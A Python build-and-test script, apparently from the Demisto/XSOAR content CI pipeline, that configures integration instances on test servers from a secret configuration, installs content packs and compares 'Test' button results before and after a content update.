parser.add_argument('-n', '--is-nightly', type=str2bool, help='Is nightly build')
parser.add_argument('-pr', '--is_private', type=str2bool, help='Is private build')
parser.add_argument('--branch', help='GitHub branch name', required=True)
parser.add_argument('--build-number', help='CI job number where the instances were created', required=True)
parser.add_argument('--test_pack_path', help='Path to where the test pack will be saved.',
default='/home/runner/work/content-private/content-private/content/artifacts/packs')
parser.add_argument('--content_root', help='Path to the content root.',
default='/home/runner/work/content-private/content-private/content')
parser.add_argument('--id_set_path', help='Path to the ID set.')
parser.add_argument('-l', '--tests_to_run', help='Path to the Test Filter.',
default='./artifacts/filter_file.txt')
parser.add_argument('-pl', '--pack_ids_to_install', help='Path to the packs to install file.',
default='./artifacts/content_packs_to_install.txt')
# disable-secrets-detection-start
parser.add_argument('-sa', '--service_account',
help=("Path to gcloud service account, is for circleCI usage. "
"For local development use your personal account and "
"authenticate using Google Cloud SDK by running: "
"`gcloud auth application-default login` and leave this parameter blank. "
"For more information go to: "
"https://googleapis.dev/python/google-api-core/latest/auth.html"),
required=False)
# disable-secrets-detection-end
options = parser.parse_args()
return options
def check_test_version_compatible_with_server(test, server_version):
"""
    Checks if a given test is compatible with the given server version.
Arguments:
test: (dict)
Test playbook object from content conf.json. May contain the following fields: "playbookID",
"integrations", "instance_names", "timeout", "nightly", "fromversion", "toversion.
server_version: (int)
The server numerical version.
Returns:
(bool) True if test is compatible with server version or False otherwise.
"""
test_from_version = format_version(test.get('fromversion', '0.0.0'))
test_to_version = format_version(test.get('toversion', '99.99.99'))
server_version = format_version(server_version)
if not LooseVersion(test_from_version) <= LooseVersion(server_version) <= LooseVersion(test_to_version):
playbook_id = test.get('playbookID')
logging.debug(
f'Test Playbook: {playbook_id} was ignored in the content installation test due to version mismatch '
f'(test versions: {test_from_version}-{test_to_version}, server version: {server_version})')
return False
return True
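# Illustrative example (hypothetical test entry): a test declaring
#   {'playbookID': 'MyPlaybook', 'fromversion': '5.5.0', 'toversion': '5.9.9'}
# is compatible with server version '5.5.0' but not with '6.0.0', since the check
# requires fromversion <= server_version <= toversion (after format_version normalization).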
def filter_tests_with_incompatible_version(tests, server_version):
"""
Filter all tests with incompatible version to the given server.
Arguments:
tests: (list)
List of test objects.
server_version: (int)
The server numerical version.
Returns:
        (list): List of filtered tests (with compatible versions)
"""
filtered_tests = [test for test in tests if
check_test_version_compatible_with_server(test, server_version)]
return filtered_tests
def configure_integration_instance(integration, client, placeholders_map):
"""
Configure an instance for an integration
Arguments:
integration: (dict)
Integration object whose params key-values are set
client: (demisto_client)
The client to connect to
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
Returns:
(dict): Configured integration instance
"""
integration_name = integration.get('name')
logging.info(f'Configuring instance for integration "{integration_name}"')
integration_instance_name = integration.get('instance_name', '')
integration_params = change_placeholders_to_values(placeholders_map, integration.get('params'))
is_byoi = integration.get('byoi', True)
validate_test = integration.get('validate_test', True)
integration_configuration = __get_integration_config(client, integration_name)
if not integration_configuration:
return None
    # In the integration configuration in content-test-conf conf.json, the validate_test flag was set to false
    if not validate_test:
        logging.debug(f'Skipping configuration for integration: {integration_name} (it has validate_test set to false)')
return None
module_instance = set_integration_instance_parameters(integration_configuration, integration_params,
integration_instance_name, is_byoi, client)
return module_instance
def filepath_to_integration_name(integration_file_path):
"""Load an integration file and return the integration name.
Args:
integration_file_path (str): The path to an integration yml file.
Returns:
(str): The name of the integration.
"""
integration_yaml = get_yaml(integration_file_path)
integration_name = integration_yaml.get('name')
return integration_name
def get_integration_names_from_files(integration_files_list):
integration_names_list = [filepath_to_integration_name(path) for path in integration_files_list]
return [name for name in integration_names_list if name] # remove empty values
def get_new_and_modified_integration_files(branch_name):
"""Return 2 lists - list of new integrations and list of modified integrations since the first commit of the branch.
Args:
branch_name: The branch name against which we will run the 'git diff' command.
Returns:
(tuple): Returns a tuple of two lists, the file paths of the new integrations and modified integrations.
"""
# get changed yaml files (filter only added and modified files)
file_validator = ValidateManager(skip_dependencies=True)
file_validator.branch_name = branch_name
modified_files, added_files, _, _ = file_validator.get_changed_files_from_git()
new_integration_files = [
file_path for file_path in added_files if
find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
modified_integration_files = [
file_path for file_path in modified_files if
isinstance(file_path, str) and find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
return new_integration_files, modified_integration_files
def is_content_update_in_progress(client):
"""Make request to check if content is updating.
Args:
client (demisto_client): The configured client to use.
Returns:
(str): Returns the request response data which is 'true' if updating and 'false' if not.
"""
host = client.api_client.configuration.host
logging.debug(f'Making "Get" request to server - "{host}" to check if content is installing.')
# make request to check if content is updating
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/content/updating',
method='GET', accept='application/json')
if status_code >= 300 or status_code < 200:
result_object = ast.literal_eval(response_data)
message = result_object.get('message', '')
logging.error(f"Failed to check if content is installing - with status code {status_code}\n{message}")
return 'request unsuccessful'
return response_data
def get_content_version_details(client, ami_name):
"""Make request for details about the content installed on the demisto instance.
Args:
client (demisto_client): The configured client to use.
ami_name (string): the role name of the machine
Returns:
(tuple): The release version and asset ID of the content installed on the demisto instance.
"""
host = client.api_client.configuration.host
logging.info(f'Making "POST" request to server - "{host}" to check installed content.')
# make request to installed content details
uri = '/content/installedlegacy' if ami_name in MARKET_PLACE_MACHINES else '/content/installed'
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path=uri,
method='POST')
try:
result_object = ast.literal_eval(response_data)
logging.debug(f'Response was {response_data}')
except ValueError:
logging.exception('failed to parse response from demisto.')
return '', 0
if status_code >= 300 or status_code < 200:
message = result_object.get('message', '')
        logging.error(f'Failed to fetch installed content details - with status code {status_code}\n{message}')
return result_object.get('release', ''), result_object.get('assetId', 0)
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, str(value))
return json.loads(item_as_string)
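# A minimal usage sketch (hypothetical values, not called anywhere in the build):
# every placeholder key in the map is substituted across the whole configuration
# object via a JSON round-trip.
def _example_change_placeholders_to_values():
    placeholders_map = {'%%SERVER_HOST%%': '10.0.0.1'}  # hypothetical server address
    config_item = {'url': 'https://%%SERVER_HOST%%:443', 'credentials': {'identifier': 'admin'}}
    # Expected result: {'url': 'https://10.0.0.1:443', 'credentials': {'identifier': 'admin'}}
    return change_placeholders_to_values(placeholders_map, config_item)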
def set_integration_params(build,
integrations,
secret_params,
instance_names,
placeholders_map,
logging_module=logging):
"""
For each integration object, fill in the parameter values needed to configure an instance from
the secret_params taken from our secret configuration file. Because there may be a number of
configurations for a single integration (if there are values provided in our secret conf for
multiple different instances of the same integration) then selects the parameter values for the
configuration of the instance whose instance is in 'instance_names' (will take the last one listed
in 'secret_params'). Note that this function does not explicitly return the modified 'integrations'
object but rather it modifies the 'integrations' object since it is passed by reference and not by
value, so the 'integrations' object that was passed to this function will have been changed once
this function has completed execution and gone out of scope.
Arguments:
build: Build object
integrations: (list of dicts)
List of integration objects whose 'params' attribute will be populated in this function.
secret_params: (list of dicts)
List of secret configuration values for all of our integrations (as well as specific
instances of said integrations).
instance_names: (list)
The names of particular instances of an integration to use the secret_params of as the
configuration values.
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
logging_module (Union[ParallelLoggingManager,logging]): The logging module to use
Returns:
(bool): True if integrations params were filled with secret configuration values, otherwise false
"""
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
# if there are more than one integration params, it means that there are configuration
# values in our secret conf for multiple instances of the given integration and now we
# need to match the configuration values to the proper instance as specified in the
# 'instance_names' list argument
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
failed_match_instance_msg = 'There are {} instances of {}, please select one of them by using' \
' the instance_name argument in conf.json. The options are:\n{}'
logging_module.error(failed_match_instance_msg.format(len(integration_params),
integration['name'],
'\n'.join(optional_instance_names)))
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
if integration['name'] not in build.unmockable_integrations:
integration['params'].update({'proxy': True})
logging.debug(
f'Configuring integration "{integration["name"]}" with proxy=True')
else:
integration['params'].update({'proxy': False})
logging.debug(
f'Configuring integration "{integration["name"]}" with proxy=False')
return True
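# Illustrative example (hypothetical secret conf entries): given two configured
# instances of the same integration,
#   [{'name': 'SplunkPy', 'instance_name': 'splunk_prod', 'params': {...}},
#    {'name': 'SplunkPy', 'instance_name': 'splunk_dev', 'params': {...}}]
# passing instance_names=['splunk_dev'] makes set_integration_params pick the
# 'splunk_dev' entry. If several entries exist and none matches a requested
# instance name, the function logs the available options and returns False.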
def set_module_params(param_conf, integration_params):
"""Configure a parameter object for use in a module instance.
Each integration parameter is actually an object with many fields that together describe it. E.g. a given
parameter will have all of the following fields - "name", "display", "value", "hasvalue", "defaultValue",
etc. This function fills the "value" field for a parameter configuration object and returns it for use in
a module instance.
Args:
param_conf (dict): The parameter configuration object.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
Returns:
(dict): The configured parameter object
"""
if param_conf['display'] in integration_params or param_conf['name'] in integration_params:
# param defined in conf
key = param_conf['display'] if param_conf['display'] in integration_params else param_conf['name']
if key == 'credentials':
credentials = integration_params[key]
param_value = {
'credential': '',
'identifier': credentials['identifier'],
'password': credentials['password'],
'passwordChanged': False
}
else:
param_value = integration_params[key]
param_conf['value'] = param_value
param_conf['hasvalue'] = True
elif param_conf['defaultValue']:
# if the parameter doesn't have a value provided in the integration's configuration values
# but does have a default value then assign it to the parameter for the module instance
param_conf['value'] = param_conf['defaultValue']
return param_conf
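# Illustrative example (hypothetical parameter): for a parameter configuration object
#   {'name': 'credentials', 'display': 'Credentials', 'defaultValue': ''}
# and integration_params
#   {'credentials': {'identifier': 'admin', 'password': '1234'}}
# set_module_params sets param_conf['value'] to
#   {'credential': '', 'identifier': 'admin', 'password': '1234', 'passwordChanged': False}
# and marks param_conf['hasvalue'] as True.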
def __set_server_keys(client, integration_params, integration_name):
"""Adds server configuration keys using the demisto_client.
Args:
client (demisto_client): The configured client to use.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
integration_name (str): The name of the integration which the server configurations keys are related to.
"""
if 'server_keys' not in integration_params:
return
logging.info(f'Setting server keys for integration: {integration_name}')
data: dict = {
'data': {},
'version': -1
}
for key, value in integration_params.get('server_keys').items():
data['data'][key] = value
update_server_configuration(
client=client,
server_configuration=data,
error_msg='Failed to set server keys'
)
def set_integration_instance_parameters(integration_configuration,
integration_params,
integration_instance_name,
is_byoi,
client):
"""Set integration module values for integration instance creation
The integration_configuration and integration_params should match, in that
they are for the same integration
Arguments:
integration_configuration: (dict)
dictionary of the integration configuration parameters/keys that need
filling to instantiate an instance of a given integration
integration_params: (dict)
values for a given integration taken from the configuration file in
which the secret values are stored to configure instances of various
integrations
integration_instance_name: (str)
The name of the integration instance being configured if there is one
provided in the conf.json
is_byoi: (bool)
If the integration is byoi or not
client: (demisto_client)
The client to connect to
Returns:
(dict): The configured module instance to send to the Demisto server for
instantiation.
"""
module_configuration = integration_configuration.get('configuration', {})
if not module_configuration:
module_configuration = []
if 'integrationInstanceName' in integration_params:
instance_name = integration_params['integrationInstanceName']
else:
instance_name = '{}_test_{}'.format(integration_instance_name.replace(' ', '_'), str(uuid.uuid4()))
# define module instance
module_instance = {
'brand': integration_configuration['name'],
'category': integration_configuration['category'],
'configuration': integration_configuration,
'data': [],
'enabled': "true",
'engine': '',
'id': '',
'isIntegrationScript': is_byoi,
'name': instance_name,
'passwordProtected': False,
'version': 0
}
# set server keys
__set_server_keys(client, integration_params, integration_configuration['name'])
# set module params
for param_conf in module_configuration:
configured_param = set_module_params(param_conf, integration_params)
module_instance['data'].append(configured_param)
return module_instance
def group_integrations(integrations, skipped_integrations_conf, new_integrations_names, modified_integrations_names):
"""
    Filter integrations into their respective lists - new, modified or unchanged. Integrations that appear on the
    skip list are skipped. If random tests were chosen, we may be configuring integrations that are neither new
    nor modified.
Args:
integrations (list): The integrations to categorize.
skipped_integrations_conf (dict): Integrations that are on the skip list.
new_integrations_names (list): The names of new integrations.
modified_integrations_names (list): The names of modified integrations.
Returns:
        (tuple): Lists of integration objects as well as an integration-to-status dictionary useful for logs.
"""
new_integrations = []
modified_integrations = []
unchanged_integrations = []
integration_to_status = {}
for integration in integrations:
integration_name = integration.get('name', '')
if integration_name in skipped_integrations_conf.keys():
continue
if integration_name in new_integrations_names:
new_integrations.append(integration)
elif integration_name in modified_integrations_names:
modified_integrations.append(integration)
integration_to_status[integration_name] = 'Modified Integration'
else:
unchanged_integrations.append(integration)
integration_to_status[integration_name] = 'Unchanged Integration'
return new_integrations, modified_integrations, unchanged_integrations, integration_to_status
def get_integrations_for_test(test, skipped_integrations_conf):
"""Return a list of integration objects that are necessary for a test (excluding integrations on the skip list).
Args:
test (dict): Test dictionary from the conf.json file containing the playbookID, integrations and
instance names.
skipped_integrations_conf (dict): Skipped integrations dictionary with integration names as keys and
the skip reason as values.
Returns:
(list): List of integration objects to configure.
"""
integrations_conf = test.get('integrations', [])
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf]
integrations = [
{'name': integration, 'params': {}} for
integration in integrations_conf if integration not in skipped_integrations_conf
]
return integrations
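# Illustrative example (hypothetical conf.json entry): a test such as
#   {'playbookID': 'SplunkPy-Test-V2', 'integrations': 'SplunkPy'}
# yields [{'name': 'SplunkPy', 'params': {}}], while any integration that appears
# in the skipped-integrations configuration is dropped from the list.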
def update_content_on_demisto_instance(client, server, ami_name):
"""Try to update the content
Args:
client (demisto_client): The configured client to use.
        server (str): The server url to pass to Tests/update_content_data.py
        ami_name (str): The role name of the machine whose content is being updated.
    """
content_zip_path = 'artifacts/all_content.zip'
update_content(content_zip_path, server=server, client=client)
# Check if content update has finished installing
sleep_interval = 20
updating_content = is_content_update_in_progress(client)
while updating_content.lower() == 'true':
sleep(sleep_interval)
updating_content = is_content_update_in_progress(client)
if updating_content.lower() == 'request unsuccessful':
# since the request to check if content update installation finished didn't work, can't use that mechanism
# to check and just try sleeping for 30 seconds instead to allow for content update installation to complete
logging.debug('Request to install content was unsuccessful, sleeping for 30 seconds and retrying')
sleep(30)
else:
# check that the content installation updated
# verify the asset id matches the circleci build number / asset_id in the content-descriptor.json
release, asset_id = get_content_version_details(client, ami_name)
logging.info(f'Content Release Version: {release}')
with open('./artifacts/content-descriptor.json', 'r') as cd_file:
cd_json = json.loads(cd_file.read())
cd_release = cd_json.get('release')
cd_asset_id = cd_json.get('assetId')
if release == cd_release and asset_id == cd_asset_id:
logging.success(f'Content Update Successfully Installed on server {server}.')
else:
logging.error(
f'Content Update to version: {release} was Unsuccessful:\nAttempted to install content with release '
f'"{cd_release}" and assetId "{cd_asset_id}" but release "{release}" and assetId "{asset_id}" '
f'were retrieved from the instance post installation.')
if ami_name not in MARKET_PLACE_MACHINES:
os._exit(1)
def report_tests_status(preupdate_fails, postupdate_fails, preupdate_success, postupdate_success,
new_integrations_names, build=None):
"""Prints errors and/or warnings if there are any and returns whether whether testing was successful or not.
Args:
preupdate_fails (set): List of tuples of integrations that failed the "Test" button prior to content
being updated on the demisto instance where each tuple is comprised of the integration name and the
name of the instance that was configured for that integration which failed.
postupdate_fails (set): List of tuples of integrations that failed the "Test" button after content was
updated on the demisto instance where each tuple is comprised of the integration name and the name
of the instance that was configured for that integration which failed.
        preupdate_success (set): List of tuples of integrations that succeeded the "Test" button prior to content
            being updated on the demisto instance where each tuple is comprised of the integration name and the
            name of the instance that was configured for that integration.
        postupdate_success (set): List of tuples of integrations that succeeded the "Test" button after content was
            updated on the demisto instance where each tuple is comprised of the integration name and the name
            of the instance that was configured for that integration.
new_integrations_names (list): List of the names of integrations that are new since the last official
content release and that will only be present on the demisto instance after the content update is
performed.
build: Build object
Returns:
(bool): False if there were integration instances that succeeded prior to the content update and then
failed after content was updated, otherwise True.
"""
testing_status = True
# a "Test" can be either successful both before and after content update(succeeded_pre_and_post variable),
# fail on one of them(mismatched_statuses variable), or on both(failed_pre_and_post variable)
succeeded_pre_and_post = preupdate_success.intersection(postupdate_success)
if succeeded_pre_and_post:
succeeded_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in succeeded_pre_and_post])
logging.success(
'Integration instances that had ("Test" Button) succeeded both before and after the content update:\n'
f'{succeeded_pre_and_post_string}')
failed_pre_and_post = preupdate_fails.intersection(postupdate_fails)
mismatched_statuses = postupdate_fails - preupdate_fails
failed_only_after_update = []
failed_but_is_new = []
for instance_name, integration_of_instance in mismatched_statuses:
if integration_of_instance in new_integrations_names:
failed_but_is_new.append((instance_name, integration_of_instance))
else:
failed_only_after_update.append((instance_name, integration_of_instance))
# warnings but won't fail the build step
if failed_but_is_new:
failed_but_is_new_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_but_is_new])
logging.warning(f'New Integrations ("Test" Button) Failures:\n{failed_but_is_new_string}')
if failed_pre_and_post:
failed_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_pre_and_post])
logging.warning(f'Integration instances that had ("Test" Button) failures '
f'both before and after the content update:\n{pformat(failed_pre_and_post_string)}')
# fail the step if there are instances that only failed after content was updated
if failed_only_after_update:
failed_only_after_update_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in failed_only_after_update])
testing_status = False
logging.critical('Integration instances that had ("Test" Button) failures only after content was updated:\n'
f'{pformat(failed_only_after_update_string)}.\n'
f'This indicates that your updates introduced breaking changes to the integration.')
else:
        # create this file to indicate that this instance passed post-update tests
if build:
with open("./Tests/is_post_update_passed_{}.txt".format(build.ami_env.replace(' ', '')), 'a'):
pass
return testing_status
def get_env_conf():
if Build.run_environment == Running.CI_RUN:
return get_json_file(Build.env_results_path)
elif Build.run_environment == Running.WITH_LOCAL_SERVER:
# START CHANGE ON LOCAL RUN #
return [{
"InstanceDNS": "http://localhost:8080",
"Role": "Server Master" # e.g. 'Server Master'
}]
elif Build.run_environment == Running.WITH_OTHER_SERVER:
return [{
"InstanceDNS": "DNS NANE", # without http prefix
"Role": "DEMISTO EVN" # e.g. 'Server Master'
}]
# END CHANGE ON LOCAL RUN #
return None
def map_server_to_port(env_results, instance_role):
"""
Arguments:
env_results: (dict)
env_results.json in server
instance_role: (str)
The amazon machine image environment whose IP we should connect to.
Returns:
        (dict): A mapping from each server's InstanceDNS to its tunnel port.
"""
ip_to_port_map = {env.get('InstanceDNS'): env.get('TunnelPort') for env in env_results if
instance_role in env.get('Role', '')}
return ip_to_port_map
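# Illustrative example (hypothetical env_results.json content):
#   [{'InstanceDNS': '10.0.0.1', 'Role': 'Server Master', 'TunnelPort': 4445},
#    {'InstanceDNS': '10.0.0.2', 'Role': 'Server 6.0', 'TunnelPort': 4446}]
# map_server_to_port(env_results, 'Server Master') -> {'10.0.0.1': 4445}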
def get_json_file(path):
with open(path, 'r') as json_file:
return json.loads(json_file.read())
def configure_servers_and_restart(build):
manual_restart = Build.run_environment == Running.WITH_LOCAL_SERVER
for server in build.servers:
configurations = dict()
configure_types = []
if is_redhat_instance(server.internal_ip):
configurations.update(DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN)
configurations.update(NO_PROXY_CONFIG)
configurations['python.pass.extra.keys'] += "##--network=slirp4netns:cidr=192.168.0.0/16"
else:
configurations.update(DOCKER_HARDENING_CONFIGURATION)
configure_types.append('docker hardening')
configure_types.append('marketplace')
configurations.update(MARKET_PLACE_CONFIGURATION)
error_msg = 'failed to set {} configurations'.format(' and '.join(configure_types))
server.add_server_configuration(configurations, error_msg=error_msg, restart=not manual_restart)
if manual_restart:
input('restart your server and then press enter.')
else:
logging.info('Done restarting servers. Sleeping for 1 minute')
sleep(60)
def get_tests(build: Build) -> List[dict]:
"""
    Selects the tests that should be run in this execution and filters out those that cannot run on this server version
Args:
build: Build object
Returns:
Test configurations from conf.json that should be run in this execution
"""
server_numeric_version: str = build.server_numeric_version
tests: dict = build.tests
if Build.run_environment == Running.CI_RUN:
filtered_tests = extract_filtered_tests()
if build.is_nightly:
# skip test button testing
logging.debug('Not running instance tests in nightly flow')
tests_for_iteration = []
else:
tests_for_iteration = [test for test in tests
if not filtered_tests or test.get('playbookID', '') in filtered_tests]
tests_for_iteration = filter_tests_with_incompatible_version(tests_for_iteration, server_numeric_version)
return tests_for_iteration
else:
# START CHANGE ON LOCAL RUN #
return [
{
"playbookID": "Docker Hardening Test",
"fromversion": "5.0.0"
},
{
"integrations": "SplunkPy",
"playbookID": "SplunkPy-Test-V2",
"memory_threshold": 500,
"instance_names": "use_default_handler"
}
]
# END CHANGE ON LOCAL RUN #
def get_changed_integrations(build: Build) -> tuple:
"""
Return 2 lists - list of new integrations and list of modified integrations since the commit of the git_sha1.
Args:
build: the build object
Returns:
list of new integrations and list of modified integrations
"""
new_integrations_files, modified_integrations_files = get_new_and_modified_integration_files(
build.branch_name) if not build.is_private else ([], [])
new_integrations_names, modified_integrations_names = [], []
if new_integrations_files:
new_integrations_names = get_integration_names_from_files(new_integrations_files)
logging.debug(f'New Integrations Since Last Release:\n{new_integrations_names}')
if modified_integrations_files:
modified_integrations_names = get_integration_names_from_files(modified_integrations_files)
logging.debug(f'Updated Integrations Since Last Release:\n{modified_integrations_names}')
return new_integrations_names, modified_integrations_names
def get_pack_ids_to_install():
if Build.run_environment == Running.CI_RUN:
with open('./artifacts/content_packs_to_install.txt', 'r') as packs_stream:
pack_ids = packs_stream.readlines()
return [pack_id.rstrip('\n') for pack_id in pack_ids]
else:
# START CHANGE ON LOCAL RUN #
return [
'SplunkPy'
]
# END CHANGE ON LOCAL RUN #
def nightly_install_packs(build, install_method=None, pack_path=None, service_account=None):
threads_list = []
if not install_method:
raise Exception('Install method was not provided.')
    # For each server url we install the pack(s)
for thread_index, server in enumerate(build.servers):
kwargs = {'client': server.client, 'host': server.internal_ip}
if service_account:
kwargs['service_account'] = service_account
if pack_path:
kwargs['pack_path'] = pack_path
threads_list.append(Thread(target=install_method, kwargs=kwargs))
run_threads_list(threads_list)
def install_nightly_pack(build):
nightly_install_packs(build, install_method=install_all_content_packs_for_nightly,
service_account=build.service_account)
create_nightly_test_pack()
nightly_install_packs(build, install_method=upload_zipped_packs,
pack_path=f'{Build.test_pack_target}/test_pack.zip')
logging.info('Sleeping for 45 seconds while installing nightly packs')
sleep(45)
def install_packs(build, pack_ids=None):
pack_ids = get_pack_ids_to_install() if pack_ids is None else pack_ids
installed_content_packs_successfully = True
for server in build.servers:
try:
_, flag = search_and_install_packs_and_their_dependencies(pack_ids, server.client)
if not flag:
raise Exception('Failed to search and install packs.')
except Exception:
logging.exception('Failed to search and install packs')
installed_content_packs_successfully = False
return installed_content_packs_successfully
def configure_server_instances(build: Build, tests_for_iteration, all_new_integrations, modified_integrations):
modified_module_instances = []
new_module_instances = []
testing_client = build.servers[0].client
for test in tests_for_iteration:
integrations = get_integrations_for_test(test, build.skipped_integrations_conf)
playbook_id = test.get('playbookID')
new_integrations, modified_integrations, unchanged_integrations, integration_to_status = group_integrations(
integrations, build.skipped_integrations_conf, all_new_integrations, modified_integrations
)
integration_to_status_string = '\n\t\t\t\t\t\t'.join(
[f'"{key}" - {val}' for key, val in integration_to_status.items()])
if integration_to_status_string:
logging.info(f'All Integrations for test "{playbook_id}":\n\t\t\t\t\t\t{integration_to_status_string}')
else:
logging.info(f'No Integrations for test "{playbook_id}"')
instance_names_conf = test.get('instance_names', [])
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf]
integrations_to_configure = modified_integrations[:]
integrations_to_configure.extend(unchanged_integrations)
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
new_ints_params_set = set_integration_params(build,
new_integrations,
build.secret_conf['integrations'],
instance_names_conf,
placeholders_map)
ints_to_configure_params_set = set_integration_params(build,
integrations_to_configure,
build.secret_conf['integrations'],
instance_names_conf, placeholders_map)
if not new_ints_params_set:
logging.error(f'failed setting parameters for integrations: {new_integrations}')
if not ints_to_configure_params_set:
logging.error(f'failed setting parameters for integrations: {integrations_to_configure}')
if not (new_ints_params_set and ints_to_configure_params_set):
continue
modified_module_instances_for_test, new_module_instances_for_test = configure_modified_and_new_integrations(
build,
integrations_to_configure,
new_integrations,
testing_client)
modified_module_instances.extend(modified_module_instances_for_test)
new_module_instances.extend(new_module_instances_for_test)
return modified_module_instances, new_module_instances
def configure_modified_and_new_integrations(build: Build,
modified_integrations_to_configure: list,
new_integrations_to_configure: list,
demisto_client: demisto_client) -> tuple:
"""
Configures old and new integrations in the server configured in the demisto_client.
Args:
build: The build object
        modified_integrations_to_configure: Integrations to configure that already exist
new_integrations_to_configure: Integrations to configure that were created in this build
demisto_client: A demisto client
Returns:
A tuple with two lists:
1. List of configured instances of modified integrations
2. List of configured instances of new integrations
"""
modified_modules_instances = []
new_modules_instances = []
for integration in modified_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client, placeholders_map)
if module_instance:
modified_modules_instances.append(module_instance)
for integration in new_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client, placeholders_map)
if module_instance:
new_modules_instances.append(module_instance)
return modified_modules_instances, new_modules_instances
def instance_testing(build: Build,
all_module_instances: list,
pre_update: bool,
use_mock: bool = True,
first_call: bool = True) -> Tuple[set, set]:
"""
Runs 'test-module' command for the instances detailed in `all_module_instances`
Args:
build: An object containing the current build info.
all_module_instances: The integration instances that should be tested
pre_update: Whether this instance testing is before or after the content update on the server.
        use_mock: Whether to use a mock while testing mockable integrations. Should be used mainly with
            private content builds, which don't use the mocks.
        first_call: indicates whether this is the first time the function is called from the same place
Returns:
A set of the successful tests containing the instance name and the integration name
A set of the failed tests containing the instance name and the integration name
"""
update_status = 'Pre' if pre_update else 'Post'
failed_tests = set()
successful_tests = set()
# Test all module instances (of modified + unchanged integrations) pre-updating content
if all_module_instances:
# only print start message if there are instances to configure
logging.info(f'Start of Instance Testing ("Test" button) ({update_status}-update)')
else:
logging.info(f'No integrations to configure for the chosen tests. ({update_status}-update)')
failed_instances = []
for instance in all_module_instances:
integration_of_instance = instance.get('brand', '')
instance_name = instance.get('name', '')
# If there is a failure, __test_integration_instance will print it
if integration_of_instance not in build.unmockable_integrations and use_mock:
success = test_integration_with_mock(build, instance, pre_update)
else:
testing_client = build.servers[0].reconnect_client()
success, _ = __test_integration_instance(testing_client, instance)
if not success:
failed_tests.add((instance_name, integration_of_instance))
failed_instances.append(instance)
else:
successful_tests.add((instance_name, integration_of_instance))
    # in case some tests failed post-update, wait 15 seconds and run the failed tests again
if failed_instances and not pre_update and first_call:
logging.info("some post-update tests failed, sleeping for 15 seconds, then running the failed tests again")
sleep(15)
succeeded, failed_tests = instance_testing(build, failed_instances, pre_update=False, first_call=False)
return successful_tests, failed_tests
def test_integration_with_mock(build: Build, instance: dict, pre_update: bool):
"""
Runs 'test-module' for given integration with mitmproxy
    In case the playback mode fails and this is a post-update run, a record attempt will be executed.
Args:
build: An object containing the current build info.
instance: A dict containing the instance details
pre_update: Whether this instance testing is before or after the content update on the server.
Returns:
The result of running the 'test-module' command for the given integration.
        If a record was executed, the result of running 'test-module' in record mode is returned.
"""
testing_client = build.servers[0].reconnect_client()
integration_of_instance = instance.get('brand', '')
logging.debug(f'Integration "{integration_of_instance}" is mockable, running test-module with mitmproxy')
has_mock_file = build.proxy.has_mock_file(integration_of_instance)
success = False
if has_mock_file:
with run_with_mock(build.proxy, integration_of_instance) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.warning(f'Running test-module for "{integration_of_instance}" has failed in playback mode')
if not success and not pre_update:
logging.debug(f'Recording a mock file for integration "{integration_of_instance}".')
with run_with_mock(build.proxy, integration_of_instance, record=True) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.debug(f'Record mode for integration "{integration_of_instance}" has failed.')
return success
def update_content_till_v6(build: Build):
threads_list = []
# For each server url we install content
for thread_index, server in enumerate(build.servers):
t = Thread(target=update_content_on_demisto_instance,
kwargs={'client': server.client, 'server': server.internal_ip, 'ami_name': build.ami_env})
threads_list.append(t)
run_threads_list(threads_list)
def disable_instances(build: Build):
for server in build.servers:
disable_all_integrations(server.client)
def create_nightly_test_pack():
test_pack_zip(Build.content_path, Build.test_pack_target)
def test_files(content_path):
packs_root = f'{content_path}/Packs'
packs = filter(lambda x: x.is_dir(), os.scandir(packs_root))
for pack_dir in packs:
        if pack_dir.name in SKIPPED_PACKS:
continue
playbooks_root = f'{pack_dir.path}/TestPlaybooks'
if os.path.isdir(playbooks_root):
for playbook_path, playbook in get_test_playbooks_in_dir(playbooks_root):
yield playbook_path, playbook
if os.path.isdir(f'{playbooks_root}/NonCircleTests'):
for playbook_path, playbook in get_test_playbooks_in_dir(f'{playbooks_root}/NonCircleTests'):
yield playbook_path, playbook
